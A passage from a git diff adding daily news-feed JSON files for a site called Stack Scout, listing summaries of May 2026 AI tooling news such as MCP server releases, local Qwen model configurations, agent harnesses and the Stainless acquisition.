My ik\\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: \"${ik-llama-cuda}/bin/llama-server\" + \" -m ${modelPath}\" + \" --host 0.0.0.0\" + \" --port ${toString cfg.port}\" + \" -c ${toString cfg.contextLength}\" + \" -ngl 999\" + \" --cpu-moe\" + \" -sm graph\" + \" -fa on\" + \" -t 16\" + \" -tb 16\" + \" -b 4096\" + \" -ub 4096\" + \" -np 1\" + \" -muge\" + \" -ger\" + \" --jinja\" + \" --metrics\" + \" --temp 1.0\" + \" --top-p 0.95\" + \" --top-k 40\" + \" --min-p 0.01\"", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-18.json b/data/news-feed-2026-05-18.json new file mode 100644 index 0000000..c2cb2b0 --- /dev/null +++ b/data/news-feed-2026-05-18.json @@ -0,0 +1,273 @@ +{ + "generated": "2026-06-05T00:44:40.968Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-18", + "article_count": 15, + "archived_story_count": 665, + "articles": [ + { + "title": "obsidian-mcp-server: v3.2.0 Released", + "url": "https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T00:07:48.000Z", + "summary": "[obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. 
Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues!", + "category": "ai_tools" + }, + { + "title": "Witchcraft, fast local semantic search on top of SQLite [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-18T16:00:06.000Z", + "summary": "**Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. 
Ever wondered \"what was that conversation where I fixed the auth middleware?\" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all…", + "category": "ai_research" + }, + { + "title": "I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time", + "url": "https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-18T10:59:47.000Z", + "summary": "Hey everyone! Running Claude Code in the terminal is amazing, but I hated the \"black box\" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \\*\\*Argus\\*\\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \\* \\*\\*Real-time Timeline:\\*\\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \\* \\*\\*Dependency Graph:\\*\\* Visually maps out which files the agent is touching and how they connect. \\* \\*\\*Cost & Loop Detection:\\*\\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! 
GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus)", + "category": "ai_tools" + }, + { + "title": "Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T20:55:54.000Z", + "summary": "Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :)", + "category": "ai_models" + }, + { + "title": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…", + "url": "https://x.com/NanoGPTcom/status/2056425379171058008", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-18T17:23:11.000Z", + "summary": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. 
In the API, set service_tier to \"flex\" or", + "category": "ai_models" + }, + { + "title": "Tried every Hermes Agent alternative so you don't have to (2026 roundup)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T17:02:19.000Z", + "summary": "Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \\~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. 
**nanobot** is \\~4000 lines of Python you can actual…", + "category": "ai_models" + }, + { + "title": "Configuration Qwen3.6-35b-a3b (12Gb VRAM)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T16:20:14.000Z", + "summary": "Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\\_K\\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\\_K\\_M for this setup? For example, would Q4\\_K\\_M, Q6\\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality?", + "category": "ai_models" + }, + { + "title": "Qwen 35b a3b surprises me", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T15:50:58.000Z", + "summary": "Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. 
For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode).", + "category": "ai_models" + }, + { + "title": "xAI Launches Grok Build — Three-Way Coding War Is Now Open", + "url": "https://x.com/Business_AI/status/2056374805163856261", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T14:47:43.601Z", + "summary": "xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI.", + "category": "ai_tools" + }, + { + "title": "New models when? Forecasting release date.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-18T09:21:34.000Z", + "summary": "After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... 
I don't know why, it seems like something's changing about \"open weights\"", + "category": "ai_models" + }, + { + "title": "Cutoff dates of open source models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-18T02:48:12.000Z", + "summary": "I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think", + "category": "ai_models" + }, + { + "title": "Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T23:07:21.000Z", + "summary": "EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. 
Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \\--- EDIT: Updated model list based on this thread's feedback... \\[Original post body\\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c…", + "category": "ai_models" + }, + { + "title": "memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client", + "url": "https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-05-18T00:20:41.000Z", + "summary": "memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. 
```bash pip install \"memvee[mcp]\" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url=\"memory.db\", default_user_id=\"alice\", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport=\"streamable-http\") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:…", + "category": "ai_tools" + }, + { + "title": "Every Markdown File You Write for AI is Already Lying to It", + "url": "https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-18T10:34:32.000Z", + "summary": "CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. 
So developers do what honest writers do - they add caveats. \"Check package.json if this is stale.\" \"Verify before running.\" \"New packages may have been added since this was written.\" The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for…", + "category": "ai_tools" + }, + { + "title": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…", + "url": "https://x.com/Shruti_0810/status/2056266132592468126", + "source": "X / @shruti_0810", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-18T06:50:24.000Z", + "summary": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. 
It scans your entire project and automatically recommends: → MCP servers →", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-19.json b/data/news-feed-2026-05-19.json new file mode 100644 index 0000000..d724b0e --- /dev/null +++ b/data/news-feed-2026-05-19.json @@ -0,0 +1,275 @@ +{ + "generated": "2026-06-05T00:44:41.184Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-19", + "article_count": 15, + "archived_story_count": 634, + "articles": [ + { + "title": "Google launches Antigravity 2.0 with an updated desktop app and CLI tool", + "url": "https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:45:37.755Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.", + "url": "https://www.digg.com/ai/9p5cqkyn?rank=2", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-19T19:45:35.241Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic just bought the company that generates most production MCP servers", + "url": "https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + 
"importance": 1, + "date": "2026-05-19T11:52:46.000Z", + "summary": "Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \\~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo…", + "category": "ai_tools" + }, + { + "title": "favorite Agentic Coding Harness", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T23:53:49.000Z", + "summary": "So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. 
I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours?", + "category": "ai_models" + }, + { + "title": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…", + "url": "https://x.com/AlternativeTo/status/2056637498978398395", + "source": "X / @alternativeto", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T07:26:04.000Z", + "summary": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. 
https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ …", + "category": "ai_tools" + }, + { + "title": "Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration", + "url": "https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:45:37.747Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.", + "url": "https://www.digg.com/ai/r5p7scr1?rank=3", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T19:45:35.257Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:17:46.000Z", + "summary": "I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? 
Anyone knows?", + "category": "ai_models" + }, + { + "title": "OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over", + "url": "https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-19T18:40:02.000Z", + "summary": "this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. 
The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k…", + "category": "ai_tools" + }, + { + "title": "Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-19T16:50:50.000Z", + "summary": "Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\\_0). Test rig: RTX 3060 Laptop 6GB, \\~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \\~2900 chars. It works, with one caveat. 
Ollama's VRAM-aware default num\\_ctx on this GPU is…", + "category": "ai_models" + }, + { + "title": "bytedance released an open source model that attempts to do just about anything with only 3b parameters", + "url": "https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-19T12:05:26.000Z", + "summary": "Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget.", + "category": "ai_models" + }, + { + "title": "How I built a 9-agent team where my agents actually talk to each other", + "url": "https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-19T09:50:18.000Z", + "summary": "I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. 
Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: \"senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br…", + "category": "ai_tools" + }, + { + "title": "We have sub-agents at home", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T01:38:42.000Z", + "summary": "At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. 
I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \\`--slot-save-path\\` and the \\`s…", + "category": "ai_models" + }, + { + "title": "Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)", + "url": "https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/", + "source": "Reddit r/ChatGPT", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T06:46:11.000Z", + "summary": "Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. 
